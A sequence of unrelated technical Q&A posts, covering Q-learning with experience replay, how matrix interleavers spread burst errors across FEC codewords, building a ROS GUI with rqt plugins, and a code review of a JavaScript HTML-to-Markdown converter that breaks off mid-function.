Ignoring the increment, the formula you are using is not from Q-learning, but effectively on policy Monte Carlo control, because you use the end-of-game sum of rewards as the Q value estimate. In theory, with a few tweaks this can be made to work, but it is a different algorithm than you say you want to learn. It is worth clarifying a few related terms (you clearly know these already, but I want to make sure you have them separated in your understanding of the rest of the answer): Reward. In RL, a reward (a real number) can be returned on every increment, after taking an action. The set of rewards is part of the problem definition. Often noted as $R$ or $r$. Return (aka Utility). The sum of all - maybe discounted - rewards from a specific point. Often noted as $G$ or $U$. Value, as in state value or action value. This is usually the expected return from a specific state or state, action pair. $Q(S_t, A_t)$ is the expected return when in state $S_t$ and taking action $A_t$. Note that using $Q$ does not make your algorithm Q-learning. The $Q$ action value is the basis for several RL algorithms. Your formula reward * gamma^(inverse position in game state) gives you the Return, $G$ seen in a sampled training game, $G_t = \gamma^{T-t} R_T$ where $T$ is the last time step in the game. That's provided the game only has a single non-zero reward at the end - in your case that is true. So you could use it as a training example, and train your network with input $S_t, A_t$ and desired output of $G_t$ calculated in this way. That should work. However, this will only find the optimal policy if you decay the exploration parameter $\epsilon$ and also remove older history from your experience table (because the older history will estimate returns based on imperfect play). 
Here is the usual way to use experience replay with Q learning: When saving experience, store $S_t, A_t, R_{t+1}, S_{t+1}$ - note that means storing immediate Reward, not the Return (yes you will store a lot of zeroes). Also note you need to store the next state. When you have enough experience to sample from, typically you do not learn from just one sample, but pick a minibatch size (e.g. 32) and train with that many each time. This helps with convergence. For Q-learning, your TD target is $R_{t+1} + \gamma \text{max}_{a'} Q(S_{t+1}, a')$, and you bootstrap from your current predictions for Q, which means: For each sample in the minibatch, you need to calculate the predicted Q value of all allowed actions from the next state $S_{t+1}$ - using the neutral network. Then use the maximum value from each state to calculate $\text{max}_{a'} Q(S_{t+1}, a')$. Train your network on the minibatch for a single step of gradient descent, with NN inputs $[S_t, A_t]$ and training label of the TD target from each example. Yes that means you use the same network to first predict and then learn from a formula based on those predictions. This can be a source of problems, so you may need to maintain two networks, one to predict and one that learns. Every few hundred updates, refresh the prediction network as a copy of the current learning network. This is quite common addition to experience replay (it is something that Deep Mind did for DQN), although may not be necessary in your case for a game as simple as Tic Tac Toe. The TD target is a bootstrapped and biased estimate of expected $G$. The bias is a potential source of problems (you may read that using NNs with Q-learning is not stable, this is one of the reasons why). However, with the right precautions, such as experience replay, the bias will reduce as the system learns. 
In case you are wondering, it is the use of both $S_t$ (as NN input) and $S_{t+1}$ (to calculate TD target) in the Q-learning algorithm, which effectively distributes the end-of-game reward back to the start of the game's Q value. In your case (and in many episodic games), it should be fine to use no discount, i.e. $\gamma = 1$ From your previous question, you noted that you were training two competing agents. That does in fact cause a problem for experience replay. The trouble is that the next state you need to train against will be the state after the opponent has made a move. So the opponent is technically viewed as being part of the environment for each agent. The agent learns to beat the current opponent. However, if the opponent is also learning an improved strategy, then its behaviour will change, meaning your stored experiences are no longer valid (in technical terms, the environment is non-stationary, meaning a policy that is optimal at one time may become suboptimal later). Therefore, you will want to discard older experience relatively frequently, even using Q-learning, if you have two self-modifying agents.
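The TD-target step of the experience-replay recipe above can be sketched in a few lines. This is an illustrative sketch, not the poster's code: the helper names and the numbers are mine, and `next_q_values` stands in for the prediction network's forward pass over the allowed actions in $S_{t+1}$.

```python
GAMMA = 1.0  # no discount; fine for an episodic game like tic-tac-toe

def td_target(reward, next_q_values, terminal):
    """Q-learning target R_{t+1} + gamma * max_a' Q(S_{t+1}, a') for one transition.

    next_q_values: predicted Q(S_{t+1}, a') for every allowed action a',
                   as returned by the (frozen) prediction network.
    terminal:      True if S_{t+1} ended the game -> no bootstrap term.
    """
    bootstrap = 0.0 if terminal else max(next_q_values)
    return reward + GAMMA * bootstrap

def minibatch_targets(batch):
    """batch: list of (reward, next_q_values, terminal) sampled from replay memory."""
    return [td_target(r, q, t) for (r, q, t) in batch]

batch = [
    (0.0, [0.2, -0.1], False),  # mid-game transition: bootstrap from next state
    (0.0, [0.5, 0.7], False),
    (1.0, [], True),            # winning move: target is just the final reward
]
print(minibatch_targets(batch))  # [0.2, 0.7, 1.0]
```

The learning network is then trained one gradient-descent step toward these targets with inputs $[S_t, A_t]$, exactly as in step 4 above.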
{ "domain": "datascience.stackexchange", "id": 2462, "tags": "machine-learning, neural-network, q-learning" }
Mechanics of a matrix Interleaver
Question: I am having trouble understanding exactly how the matrix interleaver works. I have read the following page from MathWorks. In it, it gives the following example where "123456" is interleaved as "142536." Basically, it splits every pair. Now, sending the first packet as "123456" and the 2nd packet as "142536" will allow one to correct any single deletion in each packet, with the lower bound being 6 undecodable combinations (i.e. the same character is deleted in both packets). Now, this is fine for a single deletion, but what if there is more than one deletion in each packet — will the matrix interleaver take this into account and generate a different pattern? Is there a benefit to having one pattern over another? It seems interleaving is just increasing the entropy. So, consider the following 2 patterns: 142536 and 531642. I would argue that the 2nd pattern has more entropy as every 3 bits have no adjacent characters (e.g. 531, 316, 164, 642). Answer: We have different interleaving techniques, and matrix interleaving is one of them. But at the end all of them do one thing: interleaving is a technique to protect against burst errors (no matter how we do it). To make it more clear, you should consider the reason a packet cannot be decoded (and is failed at the receiver). Each packet usually contains a number of codewords (for example of length $N$). These codewords are actually generated by encoding messages of length $K$ by an $[N,K]$ forward error correction (FEC) code. A given FEC code has a limited correction capability (usually denoted by $t$) meaning that it cannot correct more than $t$ errors in each codeword. When a packet experiences fading, a large segment of the packet might get corrupted. Eventually, there might be some codewords untouched by the fading while some others are fully influenced (which is called a burst error). In such a case, the codewords that experience fading might have more than $t$ errors.
Since the packet is only accepted if all codewords have at most $t$ errors, this results in a packet failure. The objective of performing interleaving after FEC encoding (and deinterleaving before FEC decoding) is to distribute the errors evenly among different codewords. Hence, it becomes more likely for a packet to get accepted even if it experiences a "deep" fade. So interleaving by itself is not used for error correction. It cannot change anything regarding the entropy either (since it only applies a permutation to the same random variables). It only helps to get a better efficiency from the FEC code when it faces burst errors.
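To see the burst-error spreading concretely, here is a small sketch (the helper names are mine) of the row-in/column-out matrix interleaver from the MathWorks example, with a two-symbol burst hitting the interleaved stream:

```python
def interleave(symbols, rows, cols):
    """Write the symbols into a rows x cols matrix row by row, read column by column."""
    assert len(symbols) == rows * cols
    return [symbols[r * cols + c] for c in range(cols) for r in range(rows)]

def deinterleave(symbols, rows, cols):
    # Reading the columns of a rows x cols matrix is the same as reading the
    # rows of a cols x rows matrix, so deinterleaving just swaps the roles.
    return interleave(symbols, cols, rows)

tx = interleave(list("123456"), rows=2, cols=3)
print("".join(tx))  # 142536, as in the MathWorks example

# A burst of two adjacent errors on the channel...
tx[2] = tx[3] = "x"
rx = "".join(deinterleave(tx, rows=2, cols=3))
print(rx)  # 1x34x6 -- each half now carries only one error
```

If each half ("123" and "456") were a codeword of a code with $t = 1$, both would still decode; without interleaving, the same burst would have dropped both errors into a single codeword and killed the packet.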
{ "domain": "dsp.stackexchange", "id": 4233, "tags": "matrix, information-theory, channelcoding" }
Using ROS to create a GUI
Question: Hi, my name is Michel, I'm a student and I've been creating robots since I was 15. I'm actually new to ROS and its variety of tools, and I would like to know if there is an easy way to set up a graphical user interface (GUI) for my project: the project consists of a Raspberry Pi attached to an LCD touch screen; the RPi is connected to pressure sensors and reads the values each second… My problem is that I want to display a GUI on the LCD screen so that the user can read the sensor values in a table, as well as end the program whenever he wants. I tried using Python Tkinter to do it, but I think it's a bit complicated since the main loop is constantly waiting for an "event" to happen (user interaction), thus not paying attention to sensor data coming up… Is there an easier way to do it? I mean it's a very basic operation (print data on GUI and wait for Stop button) and I wondered maybe there's a tool in ROS that could help me? Thanks in advance, Michel Originally posted by Mix_MicDev on ROS Answers with karma: 23 on 2022-03-31 Post score: 1 Answer: Hi, I was doing something similar a few years ago and we decided to create an rqt plugin specifically for our robot/need where we can display data and provide input buttons for the user. This would also enable you to use more advanced visualizations like rviz. If your robot/device is running ROS, rqt plugins are a very convenient solution. Originally posted by destogl with karma: 877 on 2022-04-03 This answer was ACCEPTED on the original site Post score: 1 Original comments Comment by Mix_MicDev on 2022-04-04: Thanks a lot for your answer! So you suggest creating a ui file with QT creator, and then converting it to an rqt_plugin? Is it possible to do this process using Python rather than C++? Comment by destogl on 2022-04-10: I don't think you have to do anything with qt creator. Simply create an rqt plugin based on examples.
If you want to do this with rqt, I think it is C++ only Comment by Mix_MicDev on 2022-04-11: Great, thanks! Do you recommend a specific tutorial for beginners? Comment by ljaniec on 2022-04-11: These places are good to start: http://wiki.ros.org/rqt/Tutorials and this page looks promising: https://fjp.at/ros/rqt-turtle/ + https://www.clearpathrobotics.com/assets/guides/kinetic/ros/Creating%20RQT%20Dashboard.html + http://wiki.ros.org/rqt/Plugins + http://wiki.ros.org/rqt Comment by Mix_MicDev on 2022-04-13: Great, thank you very much!!
{ "domain": "robotics.stackexchange", "id": 37546, "tags": "ros" }
Use of repeated numerical prefixes for substituents on methane
Question: Take trichloromethane for example. Is its preferred IUPAC name: 1,1,1-trichloromethane or simply trichloromethane? And which IUPAC rule governs this naming? Thank you! Answer: According to Nomenclature of Organic Chemistry: IUPAC Recommendations and Preferred Names 2013, P-14.3.4.2: The locant '1' is omitted in substituted mononuclear parent hydrides. For the compound $\ce{CHCl3}$ (chloroform), the parent hydride is methane, which is mononuclear. Hence the locant '1' should be omitted in the preferred IUPAC name (PIN); it is simply trichloromethane.
{ "domain": "chemistry.stackexchange", "id": 9442, "tags": "organic-chemistry, nomenclature" }
NP-hard problems but only for n≥3
Question: 2-SAT is in P; 3-SAT is NP-complete. Exact cover by 2-sets is in P; exact cover by 3-sets is NP-complete. Two-dimensional matching is in P; three-dimensional matching is NP-complete. Graph 2-coloring is trivially in P; graph 3-coloring is NP-complete. Are there other well-known or important examples that are similar, in that there is a family of problems with a natural parameter $n$, where the problem is known to be in P when $n<3$ and known to be NP-hard when $n≥3$? Answer: In graph coloring you are looking for a partitioning of the vertex set into independent sets. Now, there are many arguably well-known similarly behaving (i.e., easy for $k=2$, hard for $k \geq 3$) problems where instead you want to find a partition into $k$ sets which could be (i) independent dominating, (ii) dominating, (iii) total nearly perfect, (iv) weakly perfect dominating, or (v) total perfect dominating, to name a few. Many of these problems also appear under different shorter names like "domatic number", "total domatic number", and so on. For more details, see e.g., the work of Heggernes and Telle [1, Table 1] (there's quite a bit of follow-up work as well). Also, graph coloring is naturally linked to the classical and heavily-studied chromatic index (i.e., edge coloring) via the line graph. Further, deciding if a $k$-regular graph can be edge $k$-colored properly is NPC for every $k \geq 3$. [1] Heggernes, Pinar, and Jan Arne Telle. "Partitioning graphs into generalized dominating sets." Nord. J. Comput. 5.2 (1998): 128-142.
{ "domain": "cs.stackexchange", "id": 15029, "tags": "np-complete" }
Is the Sun prograde or retrograde with respect to the rotation of the Milky Way?
Question: I recently learned about the terms prograde and retrograde. I've seen these terms used to describe the rotations and orbits of moons with respect to their planet, and planets with respect to their star. But I haven't been able to find what the relationship is between the rotation and orbit of the Sun with respect to the rotation of the Milky Way. So, basically what I'm trying to do here is ask two questions: Is the orbit of the Sun around the center of the Milky Way prograde or retrograde with respect to the rotation of the Milky Way? Is the axial rotation of the Sun prograde or retrograde with respect to the rotation of the Milky Way? Regarding question #2, I know it might be considered a slightly weird question to ask, simply because the plane of the Solar System is significantly tilted relative to the plane of the Milky Way (by about 60°), and furthermore the Sun itself has its equatorial plane tilted by a few more degrees relative to the plane of the Solar System (about 7°). But if we mentally "flatten out" the Solar System such that the Sun's equatorial plane aligns with the plane of the Milky Way, then we can talk about whether its axial rotation is in the same direction as the rotation of the Milky Way, so I think this is a valid application of the concept. Answer: Prograde. This is usually the case for stars in spiral galaxies outside the most central regions. A galaxy can be either rotation-dominated or dispersion-dominated, depending on whether its kinematics is dominated by ordered or random motion. Spiral galaxies such as the Milky Way belong to the first class, while ellipticals belong to the second. Irregular galaxies can be somewhere in between, with random motions but with an overall rotation. In spirals, stars and gas generally rotate in the same direction (although they can have more random motion in their bulges, i.e. in the central parts). 
The Sun follows the overall rotation of the Milky Way, except for a peculiar motion of roughly 20 km/s relative to the overall rotation; the direction of this motion is known as the Solar apex. However, following a major merger event, the product can be two kinematically decoupled components. This is described well in Corsini (2014). Such a merger is required to perturb the system sufficiently. On smaller scales, however, the motion of the gas clouds giving birth to stars is more turbulent and random. Hence the rotation of a star may very well be in another direction than the overall disk rotation. As you say, the plane of the Solar System is tilted by 63º wrt. the plane of the Milky Way, in the direction that the Sun is traveling. This can be seen e.g. in this infrared IRAS image, where the angle between the bright Milky Way disk and the blue stripes — which is emission from dust in the plane of the Solar System — crosses at roughly 60º: credit: Caltech. The rotation of the Sun is also prograde wrt. the Milky Way (or else we would say that the tilt was 180º – 63º = 117º).
{ "domain": "astronomy.stackexchange", "id": 2697, "tags": "the-sun, orbit, milky-way, rotation" }
Why only perpendicular or parallel forces are counted?
Question: Usually in physics, we take components of a vector (let's say force) to find the answer. E.g., when using a force to calculate torque we take $F\sin\theta$. There are numerous such examples where we take a component of force to get a vector which is either perpendicular (sine) or parallel to the surface. But technically force is a push or pull, so it shouldn't really matter if we take a non-perpendicular force. Then why is it necessary to calculate the components of forces? Answer: Then why is it necessary to calculate the components of forces? The short answer is we may need to calculate the vertical and/or horizontal components of a force to determine what the force does. But technically force is a push or pull so it shouldn't really matter if we take non perpendicular force. See the diagram below of a box on a surface with friction. Say we want to know how much work the force $F$ does moving the box a distance $d$ against friction. We can't determine this unless we calculate both the vertical and horizontal components of $F$. We need to know the vertical component ($F$ sin θ) because this, together with the weight of the box ($mg$), will give us the force normal to the surface, $N$. We need $N$ to determine the kinetic friction force $f$. Then we need to know the horizontal component of $F$ ($F$ cos θ) because this, with the friction force $f$, will give us the net force acting in the horizontal direction. That net force times the distance the box moves gives us the net work done on the box. Hope this helps.
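Putting the answer's steps into formulas (assuming a kinetic friction coefficient $\mu_k$, which the answer leaves implicit):

```latex
\begin{align}
N &= mg - F\sin\theta, &&\text{(vertical force balance)}\\
f &= \mu_k N = \mu_k\left(mg - F\sin\theta\right), &&\text{(kinetic friction)}\\
W_\text{net} &= \left(F\cos\theta - f\right)d. &&\text{(net horizontal force times distance)}
\end{align}
```

Both components of $F$ enter the result: the vertical one indirectly through $N$ and hence $f$, the horizontal one directly, which is exactly why the decomposition is necessary.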
{ "domain": "physics.stackexchange", "id": 65825, "tags": "newtonian-mechanics, forces, rotational-dynamics, vectors, torque" }
How is the number of measurement outcomes linked to the rank of the observable?
Question: I am thinking about the following question: Assuming that we have some given state $\rho$ and we perform a measurement with $k$ outcomes on this state. Then we can describe the measurement outcomes as eigenvalues of the observable, i.e., the Hermitian operator that I denote by $D$, with probabilities $\mathrm{Tr}[D_i\rho]$, where $D_i$ are the projectors onto the $i^{th}$ eigenspace of $D$, i.e. for the eigendecomposition $D = \sum_i \lambda_i s_i s_i^T = \sum_i \lambda_i D_i$. I was wondering if my assumption is true. If the number of (distinguishable?) outcomes for any Hermitian operator is given by $k$, does it follow that we have only $k$ non-zero eigenvalues, and hence that $D$ must be of rank $\leq k$? Answer: You are implicitly making a specific assumption here: that the $\{D_i\}$ are rank 1 projectors. If your $\{D_i\}$ are rank-1 projectors, i.e. taking the form $D_i=s_is_i^T$, then, because there is a completeness relation for measurement operators, $$ \sum_iD_i=\mathbb{I}, $$ you must have a number of outcomes equal to the dimension of the Hilbert space you're measuring. Call that $k$. Now, if you define $D=\sum_i\lambda_iD_i$ where the $\lambda_i$ are distinct, then $D$ must have rank either $k$ or $k-1$: if one of the $\lambda_i$ is 0, then the number of non-zero values (which is equivalent to the rank) is $k-1$. Now, strictly, the $D_i$ could be projectors, but not have rank 1 (in fact, they don't even have to be projectors, but we won't go there...), but instead a rank $r_i=\text{Tr}(D_i)$. In this case, either $D$ is full rank (which we'll still call $k$) or, if a particular $\lambda_j=0$, then it has rank $k-r_j$, because that's the number of non-zero eigenvalues $D$ has. Here, the number of distinguishable outcomes is potentially much smaller than the rank of $D$. All you really know is that $\text{rk}(D)\geq |\{D_i\}|-1$ (i.e. the number of measurement operators minus 1, in case one of the eigenvalues is 0).
But that could be a very loose bound in some circumstances (and the bound is the opposite way round to what you were asking). Overall, the answer is that the number of distinguishable measurement outcomes is not equal to the rank of the measurement operator.
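A quick numerical illustration of both rank statements — these diagonal examples are hand-picked for the sketch, not taken from the question:

```python
import numpy as np

# k = 3 rank-1 projectors onto basis states, distinct eigenvalues (3, 2, 0):
# one eigenvalue is zero, so rank(D) = k - 1 = 2.
D = 3.0 * np.diag([1, 0, 0]) + 2.0 * np.diag([0, 1, 0]) + 0.0 * np.diag([0, 0, 1])
print(np.linalg.matrix_rank(D))  # 2

# Projectors need not be rank 1: here there are only 2 outcomes, with
# eigenvalues (5, 0), but the lambda = 5 projector has rank 3.
# Two distinguishable outcomes, yet rank(D) = 3.
D2 = 5.0 * np.diag([1, 1, 1, 0])
print(np.linalg.matrix_rank(D2))  # 3
```

The second case is exactly the "loose bound" situation: two measurement operators, so the bound only guarantees $\text{rk}(D)\geq 1$, while the actual rank is 3.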
{ "domain": "quantumcomputing.stackexchange", "id": 176, "tags": "measurement" }
Sign craziness on the stress energy tensor?
Question: I would like to know what the sign of the stress-energy tensor depends on in the following formula: $T_{\mu\nu}=\pm(\rho c^2+P)u_{\mu}u_{\nu} \pm P g_{\mu\nu}$ In my case the metric is equal to $g_{\mu\nu}=\pmatrix{-c^2 & 0 & 0 & 0\\0 & 1 & 0 & 0\\0 & 0 & 1 & 0\\0 & 0 & 0 & 1}$ and $\rho$ is the mass density. The problem is that we have: Wikipedia Stress-energy tensor: $T^{\mu\nu}=(\rho c^2+P)u^{\mu}u^{\nu} + P g^{\mu\nu}$ Tenseur énergie-impulsion: $T^{\mu\nu}=-(\rho c^2+P)u^{\mu}u^{\nu} + P g^{\mu\nu}$ Energie-Impuls-Tensor: $T^{\mu\nu}=(\rho c^2+P)u^{\mu}u^{\nu} - P g^{\mu\nu}$ Fluide parfait: $T^{\mu\nu}=(\rho c^2+P)u^{\mu}u^{\nu} - P g^{\mu\nu}$ Dérivation des équations de Friedmann: $T_{\mu\nu}=(\rho c^2+P)u_{\mu}u_{\nu} - P g_{\mu\nu}$ So why so many different signs, and what are the right ones in my case? Answer: First off, please don't use units with $c\ne 1$ in GR. It makes everything horribly messy. What we normally think of as a ruler or clock measurement is represented in GR by an upper index quantity like $\Delta x^\mu$. Therefore in a Cartesian coordinate system in the fluid's rest frame, we are guaranteed that $u^\mu=(1,0,0,0)$, not $(-1,0,0,0)$. This is independent of the choice of signature or other signs. For this reason, it's better to express everything in the upper-index form, not the lower-index form that you gave. Let $T^{\mu\nu}=s_1(\rho+P)u^{\mu}u^{\nu} +s_2 P g^{\mu\nu}$, where $s_1=\pm 1$ and $s_2=\pm 1$. We want the time-time component of T in the fluid's rest frame to depend only on $\rho$, not $P$. For people who use a metric with signature $(-,+,+,+)$, this requires $s_1=s_2$. For people who use $(+,-,-,-)$, it requires $s_1=-s_2$. In addition to choices of signature, the GR literature is blessed with several other arbitrary sign conventions that are not consistent from one author to another. MTW has a handy table of these on a page in the back of the book.
For example, the Einstein field equations may be written $G=8\pi T$ or $G=-8\pi T$. The Einstein and Riemann tensors can also be defined with either sign. I think this explains the difference between #2 and #3-5 on your list. The English Wikipedia articles on GR were almost all originally written by one guy, Chris Hillman, so they probably all follow a consistent sign convention. Clearly the French and German wikipedias don't follow the same sign conventions as the English one, and the French wikipedia doesn't seem to be internally consistent.
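The rest-frame requirement above is easy to check mechanically. Below is a small Python sketch (not part of the original answer; plain arithmetic with $c=1$, $u^\mu=(1,0,0,0)$, and the extra demand that $T^{00}=+\rho$, which also fixes the overall sign):

```python
import itertools

def T00(s1, s2, g00, rho, P):
    # Time-time component of T^{mu nu} = s1 (rho + P) u^mu u^nu + s2 P g^{mu nu}
    # in the fluid's rest frame, where u^0 = 1 regardless of signature.
    return s1 * (rho + P) + s2 * P * g00

rho, P = 2.0, 0.5  # arbitrary positive test values

for g00, signature in [(-1, "(-,+,+,+)"), (+1, "(+,-,-,-)")]:
    ok = [(s1, s2) for s1, s2 in itertools.product([1, -1], repeat=2)
          if T00(s1, s2, g00, rho, P) == rho]
    print(signature, "->", ok)
```

With the weaker condition $T^{00}=\pm\rho$ this reproduces exactly the answer's $s_1=s_2$ versus $s_1=-s_2$ rule; demanding $T^{00}=+\rho$ leaves a single $(s_1,s_2)$ combination per signature.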
{ "domain": "physics.stackexchange", "id": 7562, "tags": "general-relativity, tensor-calculus, stress-energy-momentum-tensor, conventions" }
C program to print input longer than 10 characters
Question: The program will read the user's input; if it's 10 characters or longer, it will print it. It's pretty compact and works fine. #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX_SIZE 1000 int main(void){ char line[MAX_SIZE]; int length; /*String length*/ while((fgets(line, sizeof(line), stdin) != NULL)){ line[length = (strlen(line)-1)] = '\0'; /*Remove the \n character*/ if(length >= 10){ printf("%s\n", line); } } return 0; } Not looking for anything specific, method, style, etc. Answer: Wrong functionality. line[length = (strlen(line)-1)] always truncates line[] even if it does not end with a '\n', so /*Remove the \n character*/ is not correct. Avoid a hacker exploit. What happens when line[0] == 0? Injecting a null character as part of stdin is not easy, but doable. while((fgets(line, sizeof(line), stdin) != NULL)){ line[length = (strlen(line)-1)] = '\0'; // danger fgets() treats a null character just like any non-'\n' character. So if the first character read is a null character, then strlen(line) is (size_t) 0 line[length = ((size_t) 0 - 1)] line[length = (SIZE_MAX)] = ... // access outside array bounds --> UB The solution is to test the length or use strcspn() size_t length = strlen(line); if (length > 0 && line[length - 1] == '\n') line[--length] = '\0'; // or line[strcspn(line, "\n")] = '\0'; Code does not consume the remainder of the line, should it have more than MAX_SIZE - 1 characters in it. Failure to consume the rest of the line causes the next iteration of the loop to pick up the old line, resulting in erroneous reports. Entering a line of MAX_SIZE + 10 characters will demonstrate the problem.
Staying with fgets() (assumed requirement, else consider fgetc()) does pose limitations, like trouble detecting null characters, yet aside from that: while((fgets(line, sizeof line, stdin) != NULL)){ bool eol_missing = true; size_t length = strlen(line); if (length > 0 && line[length - 1] == '\n') { eol_missing = false; line[--length] = '\0'; } if (length >= 10) { printf("%s", line); // or fputs() } if (eol_missing) { // consume rest of the line int ch; while ((ch = fgetc(stdin)) != '\n' && ch != EOF) { fputc(ch, stdout); // or putchar() } } printf("\n"); // or putchar(), puts(), etc. } return 0; Pedantic code would check if (length >= 10) before fputc(ch, stdout); (pesky embedded null characters again.) and once a line was read, look for a rare input error with ferror() before calling fgetc(). If null characters in a line are a real concern for correct functionality, fgets() is not the function to use. -- Minor: Extra outside () // v----------------------------------------v while((fgets(line, sizeof(line), stdin) != NULL)){ // could use while (fgets(line, sizeof(line), stdin) != NULL) { // or while (fgets(line, sizeof line, stdin) != NULL) { // or even while (fgets(line, sizeof line, stdin)) {
{ "domain": "codereview.stackexchange", "id": 24765, "tags": "c" }
HTML to Markdown converter
Question: I've made a simple HTML→Markdown converter in Javascript and am looking for any feedback. For now, I've basically used Stack Exchange's /editing-help as a guide as to what to convert, but I might look at CommonMark's spec later on. It uses DOMParser() and then goes through the child nodes to convert things. My test HTML string right now is: <h1>h1</h1> <br> <h2>h2</h2> <br> <h3>h3</h3> <br>text outside everything <br> <h2>(and another element!)</h2> <br> <img src='http://example.com/example.png'> <br><a href='http://google.com'>a link!</a> <br> <ul> <li>item 1</li> <li>item 2</li> <li>item 3</li> </ul> <br> <ol> <li>item 1</li> <li>item 2</li> <li>item 3</li> </ol> <br><strong>BOLD TEXT</strong> and <i>ITALICISED TEXT</i> <br> <blockquote>blockquote</blockquote> <br> and that conversion 'works': # h1 ## h2 ### h3 text outside everything ## (and another element!) ![enter image description here](http://example.com/example.png) [a link!](http://google.com) - item 1 - item 2 - item 3 1. item 1 2. item 2 3. 
item 3 **BOLD TEXT** and *ITALICISED TEXT* > blockquote Code var str = "<h1>h1</h1> <br>" str += "<h2>h2</h2> <br>"; str += "<h3>h3</h3> <br>"; str += "text outside everything <br>"; str += "<h2>(and another element!)</h2> <br>" str += "<img src='http://example.com/example.png'> <br>"; str += "<a href='http://google.com'>a link!</a> <br>"; str += "<ul><li>item 1</li><li>item 2</li><li>item 3</li></ul> <br>"; str += "<ol><li>item 1</li><li>item 2</li><li>item 3</li></ol> <br>"; str += "<strong>BOLD TEXT</strong> and <i>ITALICISED TEXT</i> <br>"; str += "<blockquote>blockquote</blockquote>"; var doc = new DOMParser().parseFromString(str, 'text/html'); var childnodes = doc.body.childNodes; var markdown = ''; var conversions = { br: function(data) { return '\n\n'; }, h1: function(data) { return '# ' }, h2: function(data) { return '## '; }, h3: function(data) { return '### '; }, hr: function(data) { return '---\n'; }, blockquote: function(data) { return '> '; }, img: function(data) { var imgStr = "![alt text](" + data.curEl.src + ")"; return imgStr; }, a: function(data) { return "[" + data.html + "](" + data.curEl.getAttribute('href') + ")"; }, ul: function(data) { var lis = childnodes[data.i].childNodes; var newmd = ''; var lislength = lis.length; for (var x = 0; x < lislength; x++) { newmd += "- " + lis[x].innerHTML + "\n"; } return newmd; }, ol: function(data) { var lis = childnodes[data.i].childNodes; var counter = 1; var newmd = ''; var lislength = lis.length for (var x = 0; x < lislength; x++) { newmd += counter + ". 
" + lis[x].innerHTML + "\n"; counter++; } return newmd; }, strong: function(data) { return "**" + data.html + "**"; }, i: function(data) { return "*" + data.html + "*"; } }; function convertToMarkdown(curEl, html, tag, i) { if (tag == undefined) { //for text nodes markdown += curEl.textContent; } else { tag = tag.toLowerCase(); console.log(tag); markdown += conversions[tag]({ curEl: curEl, html: html, tag: tag, i: i }) + (['ul', 'ol', 'i', 'strong', 'a'].indexOf(tag) > -1 ? '' : html); } } var length = childnodes.length; for (var i = 0; i < length; i++) { var curEl = childnodes[i], html = childnodes[i].innerHTML, tag = childnodes[i].tagName; convertToMarkdown(curEl, html, tag, i); } console.log(markdown); (you can check the output yourself in the console) Main Questions: Is my code readable? How can I make it more so? Is there a cleaner way to do any part of this? Answer: Your code isn't that much re-usable. I can't include it in a file and call it since I could easily break it from anywhere. What I suggest is that you wrap it in the following block: (function(window, undefined){ 'use strict'; [code] })(Function('return this')()); This will protect your code in so many ways: You guarantee that the window object is the window You guarantee that undefined is really undefined You can be 100% sure that there won't be variables on the global scope All variables are local (looks the same, but it is a tiny bit different) The possibility of a script screwing up your code is null. And this takes what? 1 minute? And you have to change almost nothing! You will notice the 'use strict;' there. You may be alienated by it. This has been re-re-re-re-re-re-itterated here. Using it adds some security features and prevent some 'stupid' bloopers and other mistakes and distractions. You can read about it in greater detail on MDN's page. You currently are writting everything into the markdown variable. 
Before going any further, let me take the liberty of teaching you about the amazing return statement: When a return statement is called in a function, the execution of this function is stopped. If specified, a given value is returned to the function caller. If the expression is omitted, undefined is returned instead. Source: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/return Inside your convertToMarkdown() function, instead of cramming it all into that variable, use a return. Inside the same function, you have the following: if (tag == undefined) { //for text nodes markdown += curEl.textContent; } else { Which isn't fine. It is too complex to explain in less than 20k characters, but that piece must be gone! I'll show how later on. One of the problems with this is also that you are using .textContent. That isn't very compatible with other "browsers" (*cough* IE *cough*). The most compatible method is by using .innerText. But Firefox now decided that it wouldn't support it. Fear not, just add this line at the top: var TEXT_PROPERTY = document.head.innerText ? 'innerText' : 'textContent'; And use it like curEl[TEXT_PROPERTY] to get the text content. Instead of re-creating a parser object, you can simply create a <div>, keep it in memory, and use it to extract the elements. Setting the .innerHTML of that element will have the same effect as the parser, but faster. You then have access to tons of tools readily available on DOM elements. Your choice of newlines is quite weird. Browsers will convert them to \r\n all the time. You can use it, since you know what to expect. Imagine what it would be like to write \n and get \r\n instead. That would drive some guys insane! On your conversions object, you have methods that have 1 argument, but use it for nothing. You could just drop that useless argument. Done. And now, my promised alternative: (function(window, undefined){ 'use strict'; var TEXT_PROPERTY = document.head.innerText ?
'innerText' : 'textContent'; var NEWLINE = '\r\n'; var indent = function(text){ return text.replace(/(\r\n|\r|\n)/g,'$1 '); }; var conversions = { BR: function(){ return ' ' + NEWLINE; }, P: function(elem) { return NEWLINE + NEWLINE + elem.innerHTML + NEWLINE; }, H1: function(elem) { return '# ' + elem.innerHTML + NEWLINE; }, H2: function(elem) { return '## ' + elem.innerHTML + NEWLINE; }, H3: function(elem) { return '### ' + elem.innerHTML + NEWLINE; }, HR: function() { //we use 4 to do not cause confusion with <strike></strike> return '----' + NEWLINE; }, BLOCKQUOTE: function(elem) { return '> ' + elem .innerHTML .replace( /(\r\n|\r|\n)/g, '$1> ' ); }, IMG: function(elem) { return '![alt text](' + elem.src + ')'; }, A: function(elem) { return '[' + elem.innerHTML + '](' + elem.href + ')'; }, UL: function(elem) { var li = elem.children; var length = li.length; var md = ''; for (var i = 0; i < length; i++) { md += ' - ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, OL: function(elem) { var li = elem.children; var length = li.length; var md = ''; var start = elem.start|0; for (var i = 0; i < length; i++) { md += (i + start) + '. ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, B: function(elem) { return '**' + elem.innerHTML + '**'; }, STRONG: function(elem) { return this.B(elem); }, STRIKE: function(elem) { return '---' + elem.innerHTML + '---'; }, DEL: function(elem) { return this.STRIKE(elem); }, I: function(elem) { return '*' + elem.innerHTML + '*'; }, PRE: function(elem){ return indent(this.innerHTML) + NEWLINE; }, CODE: function(elem){ if(elem.parentNode.tagName != 'PRE') { return '``' + elem.innerHTML.replace(/\r|\n/g,'').replace(/^\s*(.*)\s*$/,'$1') + '``'; } else { this.PRE(elem); } } }; var toMarkdown = function(html){ var DIV = document.createElement('div'); //will have the HTML to parse. 
